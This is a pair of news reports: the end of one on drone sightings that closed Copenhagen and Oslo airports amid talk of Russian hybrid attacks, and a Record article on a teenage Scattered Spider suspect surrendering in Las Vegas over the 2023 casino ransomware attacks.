Hansen said police were cooperating with the Danish military and intelligence service to find out where the drones had come from. He said police were also working with colleagues in Oslo after drone sightings in the Norwegian capital also caused the airport to close for several hours.

“We had two different drone sightings,” said Oslo airport spokeswoman Monica Fasting.

Though no culprit has been definitively identified, there is already speculation.

“Obvious to view the drones over Kastrup as a hybrid attack” was the title of a live blog post by Jakob Hvide Beim, defence editor at leading Danish newspaper Politiken. He went on to explain that the authorities have been warning about the risk of Russian hybrid attacks against Denmark “for some time now”.

Why Denmark specifically? Copenhagen’s track record of significant Ukraine support, Hvide Beim says, noting as example Denmark having “taken the lead by offering Ukrainian arms factories the opportunity to open production” in Denmark.

Ukrainian President Volodymyr Zelenskyy posted on X about a Russian incursion of Danish airspace on 22 September, albeit without providing proof or substantiating further.

Last night’s drone incursion over Denmark and Norway comes after a spate of Russian aerial incursions over NATO territory. Two weeks ago, Poland shot down several of the 20 Russian drones that entered its airspace which led Warsaw to activate NATO’s Article 4 – meaning it believes there is a credible threat to the country’s security.

Friday last week, Russian fighter jets entered Estonian airspace, lingering for 12 minutes and prompting Tallinn to likewise initiate conversations under the umbrella of Article 4, which will take place today.

(cp, vib)

| The Record from Recorded Future News
Jonathan Greig
September 22nd, 2025

A 17-year-old male surrendered to police in Las Vegas and was booked on charges related to 2023 cyberattacks against the city's casino and hospitality industry.

A suspected member of the Scattered Spider cybercriminal organization turned themselves in to Las Vegas police last week under accusations that they were behind multiple cyberattacks targeting casinos in the city.

The Las Vegas Metropolitan Police Department released a brief statement on Friday afternoon confirming that an unnamed juvenile suspect surrendered himself to the Clark County Juvenile Detention Center on September 17. He was booked on several charges related to cyberattacks on multiple Las Vegas casino properties between August 2023 and October 2023, police said.

Those dates line up with ransomware attacks on Caesars Entertainment and MGM Resorts — both of which own multiple casinos and hotels across Las Vegas.

Las Vegas Police said the attacks were attributed to Scattered Spider and noted that the FBI took over the investigation.

The unnamed suspect was charged with three counts of obtaining and using the personal information of another person, one count of extortion, one count of conspiracy to commit extortion and one count of unlawful acts regarding computers.

The Clark County District Attorney’s Office said it is looking to transfer the person to the criminal division, where he will face the charges as an adult.

The ransomware attack on MGM Resorts cost the company more than $100 million and left thousands of Las Vegas visitors scrambling to deal with widespread technology outages caused by the incident. The attackers also stole sensitive personal information on millions of customers and employees.

Members of the group later launched an assault in 2025 on multiple industries — shutting down several airlines, major insurance companies and high-profile retailers from March to July.

The group most recently took credit for a damaging attack on British automotive giant Jaguar Land Rover.

Law enforcement agencies have recently stepped up efforts to arrest, charge and convict members of the group.

Last year, police in the U.K. arrested a 17-year-old for his alleged role in the MGM attack.

Last week, a U.K. national was arrested in London and concurrently charged by U.S. prosecutors for his involvement in at least 120 attacks launched by Scattered Spider.

Other members of the group were recently slapped with years-long prison sentences for launching attacks.